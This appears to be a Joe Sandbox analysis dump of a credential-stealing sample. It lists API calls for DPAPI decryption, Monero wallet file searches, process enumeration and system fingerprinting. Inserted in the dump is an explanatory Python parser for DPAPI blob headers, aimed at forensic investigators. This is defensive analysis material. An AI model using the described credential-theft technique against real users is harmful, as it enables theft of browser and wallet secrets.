                                • Instruction Fuzzy Hash: 8AB2F5F3A0C2049FE3046E29EC4567AFBE5EF94720F1A493DEAC4C3744EA3598458697
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                • GetKeyboardLayoutList.USER32(00000000,00000000,00EC05B7), ref: 00EB7D71
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00EB7D89
                                • GetKeyboardLayoutList.USER32(?,00000000), ref: 00EB7D9D
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00EB7DF2
                                • LocalFree.KERNEL32(00000000), ref: 00EB7EB2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: _ot$&F_s$&F_s$P3w_$nL=$sLv~$_~
                                • API String ID: 0-653492069
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00EC0D79), ref: 00EAE5A2
                                • StrCmpCA.SHLWAPI(?,00EC15F0), ref: 00EAE5F2
                                • StrCmpCA.SHLWAPI(?,00EC15F4), ref: 00EAE608
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00EAECDF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 433455689-1173974218
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: wu$-z{?$?o"K$@QJ$IX]$j}'o
                                • API String ID: 0-2850533717
                                APIs
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00EAA23F
                                • LocalAlloc.KERNEL32(00000040,?,?,?,00EA4F3E,00000000,?), ref: 00EAA251
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00EAA27A
                                • LocalFree.KERNEL32(?,?,?,?,00EA4F3E,00000000,?), ref: 00EAA28F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID: >O
                                • API String ID: 4291131564-1870091082
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !)*$Da{i$a1o$b!|$ro;
                                • API String ID: 0-437545789
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: \u$\u${${$}$}
                                • API String ID: 0-582841131
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00EAC971
                                • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00EAC97C
                                • lstrcat.KERNEL32(?,00EC0B47), ref: 00EACA43
                                • lstrcat.KERNEL32(?,00EC0B4B), ref: 00EACA57
                                • lstrcat.KERNEL32(?,00EC0B4E), ref: 00EACA78
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 00EB6C0C
                                • sscanf.NTDLL ref: 00EB6C39
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00EB6C52
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00EB6C60
                                • ExitProcess.KERNEL32 ref: 00EB6C7A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Time$System$File$ExitProcesssscanf
                                • String ID:
                                • API String ID: 2533653975-0
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00EA72AD
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EA72B4
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00EA72E1
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00EA7304
                                • LocalFree.KERNEL32(?), ref: 00EA730E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: 4c76f88fec89694603c680eb2207758aa75049885a88f0e3a4cd46ec637eb948
                                • Instruction ID: b1dbb272326707cc23c5a155aba828e742a5c2813cb6ee12f080d5400fffa35a
                                • Opcode Fuzzy Hash: 4c76f88fec89694603c680eb2207758aa75049885a88f0e3a4cd46ec637eb948
                                • Instruction Fuzzy Hash: 11010C75A44308BBDB24DFE4DD4AF9E7778AB48B04F104554FB15BA2C4D6B0AA408B64
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00EB97AE
                                • Process32First.KERNEL32(00EC0ACE,00000128), ref: 00EB97C2
                                • Process32Next.KERNEL32(00EC0ACE,00000128), ref: 00EB97D7
                                • StrCmpCA.SHLWAPI(?,00000000), ref: 00EB97EC
                                • CloseHandle.KERNEL32(00EC0ACE), ref: 00EB980A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: ae35c08637c6df323588cb549a71bea9d6c1a094b1bcecb1f946cc6fa3b2422e
                                • Instruction ID: 7a8c95648c604794019b5bd2c297af933e2300a8af53172871a0d7f21171f576
                                • Opcode Fuzzy Hash: ae35c08637c6df323588cb549a71bea9d6c1a094b1bcecb1f946cc6fa3b2422e
                                • Instruction Fuzzy Hash: 77012175A10209EBDB28DFA4D948BEEB7F9BF08700F104599E519E7280EB309B80CF50
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: <7\h$huzx
                                • API String ID: 0-2989614873
                                • Opcode ID: b1959c369d596a5e5fa06e222f24d624f052ef4e8d009fdc83557cd618c55d78
                                • Instruction ID: d17dc9e95289d0bdb1b25d28b8753b9d96c7fe79ce3e36e640e033c58bf34122
                                • Opcode Fuzzy Hash: b1959c369d596a5e5fa06e222f24d624f052ef4e8d009fdc83557cd618c55d78
                                • Instruction Fuzzy Hash: 1E63417341EBD41EC727CB3047B6A927F66FA1331031859CEC4C1AB4B3C692AA56E356
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: $ n$0bm$0bm$0O\
                                • API String ID: 0-2677530187
                                • Opcode ID: 034902909c1fa3881002cdb4777daa40fd312e5763bc191a20c31ffda871b4bf
                                • Instruction ID: d6346a60c5333b5bc61d4f3e1c26e2c8fd35514815631a159930866b29ac9d18
                                • Opcode Fuzzy Hash: 034902909c1fa3881002cdb4777daa40fd312e5763bc191a20c31ffda871b4bf
                                • Instruction Fuzzy Hash: 9DB249F3A082049FE3046E2DEC8567AFBE9EF94720F16853DE6C5C3744EA7558018693
                                APIs
                                • CryptBinaryToStringA.CRYPT32(00000000,00EA51D4,40000001,00000000,00000000,?,00EA51D4), ref: 00EB9050
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptString
                                • String ID:
                                • API String ID: 80407269-0
                                • Opcode ID: 62861d4d30881197b7e0d2a40ac91921cfae7682bc2b93feab1394f63cea8fcb
                                • Instruction ID: b76dd069f0136a363f3be77c2ca46b6ca778e75ecd545674278d5e052835efbf
                                • Opcode Fuzzy Hash: 62861d4d30881197b7e0d2a40ac91921cfae7682bc2b93feab1394f63cea8fcb
                                • Instruction Fuzzy Hash: DB11F574200208EFDF04EF64D894BEB37A9AF8A314F10A458FA299B341D775E9419BA0
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,01BFEE78,00000000,?,00EC0DF8,00000000,?,00000000,00000000), ref: 00EB7BF3
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EB7BFA
                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,01BFEE78,00000000,?,00EC0DF8,00000000,?,00000000,00000000,?), ref: 00EB7C0D
                                • wsprintfA.USER32 ref: 00EB7C47
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID:
                                • API String ID: 3317088062-0
                                • Opcode ID: 490134a11591731fc85cda7a90be9d779fe8ef5607d3f91782843a99a473a15b
                                • Instruction ID: c7c93e5068373ec2b20e85f163ac9747a835027618eef3b7367603566252d690
                                • Opcode Fuzzy Hash: 490134a11591731fc85cda7a90be9d779fe8ef5607d3f91782843a99a473a15b
                                • Instruction Fuzzy Hash: 8B118EB1905218EBEB248F54DD49FAABB78FB44711F1003A9F629A33C0D7745A808F50
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 2+$:w>$=~q
                                • API String ID: 0-3170428094
                                • Opcode ID: 181f33439d4be57c7db7880e8759bc5b4fe3b6063476fa8f0259b03aae570d70
                                • Instruction ID: 1eec8fb278f24c7f40ca15805e9bd74f87ba44ae0ee2188210f3035b780bdac4
                                • Opcode Fuzzy Hash: 181f33439d4be57c7db7880e8759bc5b4fe3b6063476fa8f0259b03aae570d70
                                • Instruction Fuzzy Hash: F0B209F360C2049FE308AE29EC4567AFBE9EFD4720F16893DE6C5C3744EA3558058696
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: (Cyr$@}M$OBlu
                                • API String ID: 0-1330563399
                                • Opcode ID: cecf402a6a07a704180f09a85d1f449196f67326d2e128749f4edf13f4f2de27
                                • Instruction ID: a8e69948558d5aa7feda31a6e77e1ab7b62c9a5b3a46b204944448b378277e32
                                • Opcode Fuzzy Hash: cecf402a6a07a704180f09a85d1f449196f67326d2e128749f4edf13f4f2de27
                                • Instruction Fuzzy Hash: 60B249F3A0C2149FE304AE2DEC8567AF7E5EF94220F1A453DEAC4C7744E67598018697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: )?$=~n$D?;{
                                • API String ID: 0-4190960460
                                • Opcode ID: ecbaa53ea9681492aac4a121bfb540c4aca9e9b2054005cef48e3feeb2fddb06
                                • Instruction ID: 139f1bf0c9db0c3ba3b5c93a66ff46c2ccbb7295119d33c43eca16ffb913278e
                                • Opcode Fuzzy Hash: ecbaa53ea9681492aac4a121bfb540c4aca9e9b2054005cef48e3feeb2fddb06
                                • Instruction Fuzzy Hash: CAB217F360C2009FE304AE2DEC8567ABBE9EF94720F1A893DE6C4C7744E93558458697
                                APIs
                                • CoCreateInstance.COMBASE(00EBE120,00000000,00000001,00EBE110,00000000), ref: 00EB39A8
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00EB3A00
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWide
                                • String ID:
                                • API String ID: 123533781-0
                                • Opcode ID: 52deb3f8119649857d86635a5ab56f327cd650ecac65dd8b55258ceb51749eda
                                • Instruction ID: fabfb4a067770e13ac8a0968dc04390d14c87d7623b026f2f082c742cb7b9393
                                • Opcode Fuzzy Hash: 52deb3f8119649857d86635a5ab56f327cd650ecac65dd8b55258ceb51749eda
                                • Instruction Fuzzy Hash: C6411670A00A289FDB24DB58CC95BDBB7B5AB48302F5051D8E618E72D0D7B16EC5CF50
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: JX{$N_^{$v2?o
                                • API String ID: 0-2411433865
                                • Opcode ID: c6c43845b8480d6430f0f815413df5d6b2a8734fac737744b113262110cb61ca
                                • Instruction ID: cff8bef988eee4c438d118a7db32b668d4ec77fe6e1b7aaad53ae85d8d761e5e
                                • Opcode Fuzzy Hash: c6c43845b8480d6430f0f815413df5d6b2a8734fac737744b113262110cb61ca
                                • Instruction Fuzzy Hash: 99423BF3A0C2009FE3086E2DEC9567ABBE9EFD4320F1A853DE6C5C7744E97558018696
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00EAA2D4
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00EAA2F3
                                • LocalFree.KERNEL32(?), ref: 00EAA323
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: 9a59df533d791d792d93a92e50da7e7106b901f5f30aa722a74d6248c8bf58f3
                                • Instruction ID: ca74ae93c4152b469232da36af2703b6bcf6e61b0b2364bcd875721f35888019
                                • Opcode Fuzzy Hash: 9a59df533d791d792d93a92e50da7e7106b901f5f30aa722a74d6248c8bf58f3
                                • Instruction Fuzzy Hash: CC11E8B4A00309DFCB04DFA4D889AAEB7B5FB89300F108569ED15A7390D730AE50CF61
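The function above is the credential-decryption primitive of the sample: CryptUnprotectData is called with every optional argument NULL (no description pointer, no optional entropy, no prompt structure, flags 0), a local buffer is obtained with LocalAlloc(LPTR, ...) and the DPAPI output is released with LocalFree, as CryptUnprotectData requires. Because DPAPI binds a blob to the logged-on user's master key and not to the application that created it, any process running as that user, the stealer included, can decrypt data that a browser or mail client protected this way. The parser below is an added example for readers of this report, not code from the sample or from Joe Sandbox; it shows what such a blob looks like before it reaches CryptUnprotectData by reading the DPAPI header (fixed provider GUID, the master-key GUID that names the key file under %APPDATA%\Microsoft\Protect\<SID> needed for offline decryption, cipher and hash algorithm IDs, salt, ciphertext and signature) and by stripping the 5-byte "DPAPI" prefix Chromium places before the blob it stores base64-encoded as os_crypt.encrypted_key in "Local State". The blob in the code is constructed for the example and the master-key GUID in it is invented.

```python
"""Parse the on-disk layout of a Windows DPAPI blob, i.e. the input to CryptUnprotectData.

Added example for the Joe Sandbox report; not code from the sample or the sandbox.
"""
import struct
import uuid

DPAPI_PROVIDER_GUID = "df9d8cd0-1501-11d1-8c7a-00c04fc297eb"  # constant in every DPAPI blob
CHROMIUM_PREFIX = b"DPAPI"  # Chromium prepends this to the blob in Local State/os_crypt.encrypted_key

ALG_NAMES = {0x6603: "CALG_3DES", 0x6610: "CALG_AES_256", 0x8004: "CALG_SHA1", 0x800E: "CALG_SHA_512"}
ALG_BITS = {0x6603: 192, 0x6610: 256, 0x8004: 160, 0x800E: 512}


def _u32(buf: bytes, off: int):
    return struct.unpack_from("<I", buf, off)[0], off + 4


def _counted(buf: bytes, off: int):
    """Read a DWORD length followed by that many bytes."""
    n, off = _u32(buf, off)
    return buf[off:off + n], off + n


def parse_dpapi_blob(blob: bytes) -> dict:
    """Return the header fields of a DPAPI blob; strips Chromium's 'DPAPI' prefix if present."""
    if blob.startswith(CHROMIUM_PREFIX):
        blob = blob[len(CHROMIUM_PREFIX):]
    off = 0
    version, off = _u32(blob, off)
    provider = str(uuid.UUID(bytes_le=blob[off:off + 16]))
    off += 16
    if version != 1 or provider != DPAPI_PROVIDER_GUID:
        raise ValueError("not a DPAPI blob (version/provider mismatch)")
    _mk_version, off = _u32(blob, off)
    master_key = str(uuid.UUID(bytes_le=blob[off:off + 16]))  # which master-key file decrypts this
    off += 16
    flags, off = _u32(blob, off)
    desc_raw, off = _counted(blob, off)          # UTF-16LE, NUL-terminated description
    alg_crypt, off = _u32(blob, off)
    alg_crypt_bits, off = _u32(blob, off)
    salt, off = _counted(blob, off)
    _hmac_key, off = _counted(blob, off)         # only set for "strong" blobs, normally empty
    alg_hash, off = _u32(blob, off)
    _alg_hash_bits, off = _u32(blob, off)
    hmac2_key, off = _counted(blob, off)
    data, off = _counted(blob, off)
    sign, off = _counted(blob, off)
    if off != len(blob):
        raise ValueError("truncated blob or trailing bytes after signature")
    return {
        "master_key_guid": master_key,
        "flags": flags,
        "description": desc_raw.decode("utf-16-le").rstrip("\x00"),
        "alg_crypt": ALG_NAMES.get(alg_crypt, hex(alg_crypt)),
        "alg_crypt_bits": alg_crypt_bits,
        "alg_hash": ALG_NAMES.get(alg_hash, hex(alg_hash)),
        "salt": salt,
        "hmac2_key_len": len(hmac2_key),
        "ciphertext_len": len(data),
        "sign_len": len(sign),
    }


def build_dpapi_blob(master_key_guid: str, description: str, salt: bytes, hmac2_key: bytes,
                     data: bytes, sign: bytes, alg_crypt: int = 0x6610, alg_hash: int = 0x800E,
                     flags: int = 0) -> bytes:
    """Serialize a blob with the same layout (used here only to construct the sample input)."""
    def counted(b: bytes) -> bytes:
        return struct.pack("<I", len(b)) + b

    desc = description.encode("utf-16-le") + b"\x00\x00"
    return (struct.pack("<I", 1) + uuid.UUID(DPAPI_PROVIDER_GUID).bytes_le
            + struct.pack("<I", 1) + uuid.UUID(master_key_guid).bytes_le
            + struct.pack("<I", flags) + counted(desc)
            + struct.pack("<II", alg_crypt, ALG_BITS[alg_crypt]) + counted(salt) + counted(b"")
            + struct.pack("<II", alg_hash, ALG_BITS[alg_hash]) + counted(hmac2_key)
            + counted(data) + counted(sign))


# Constructed sample, not captured data: the shape of os_crypt.encrypted_key after base64-decoding.
SAMPLE_MASTER_KEY = "1b3e4c5d-6f70-4a81-9b2c-3d4e5f607182"  # invented GUID
CONSTRUCTED_BLOB = CHROMIUM_PREFIX + build_dpapi_blob(
    SAMPLE_MASTER_KEY, "", b"\x11" * 32, b"\x22" * 32, b"\x33" * 48, b"\x44" * 64)

if __name__ == "__main__":
    for key, value in parse_dpapi_blob(CONSTRUCTED_BLOB).items():
        print(f"{key:16} {value!r}")
```

In an investigation the parser is useful on blobs recovered from disk images or from the stealer's exfiltrated archive: the master-key GUID identifies which %APPDATA%\Microsoft\Protect\<SID>\<GUID> file (plus the user's password or the domain backup key) is needed to reproduce the decryption offline, and a salt, ciphertext or signature length that is not the expected size indicates a truncated or tampered blob rather than a DPAPI failure.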
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: dzX$w$u}
                                • API String ID: 0-3197744256
                                • Opcode ID: a388efae4a7fd397c66eb1421c187bdf971573e3bf0670fc3cff93329dbd55ed
                                • Instruction ID: bbec82ecfb08c66db5756ebce6e360850e84eced5b3ee69f77098b70e79237a7
                                • Opcode Fuzzy Hash: a388efae4a7fd397c66eb1421c187bdf971573e3bf0670fc3cff93329dbd55ed
                                • Instruction Fuzzy Hash: 73B2F8F360C204AFE304AF29EC8567AFBE9EF94720F1A492DE6C4C3744E63558018697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
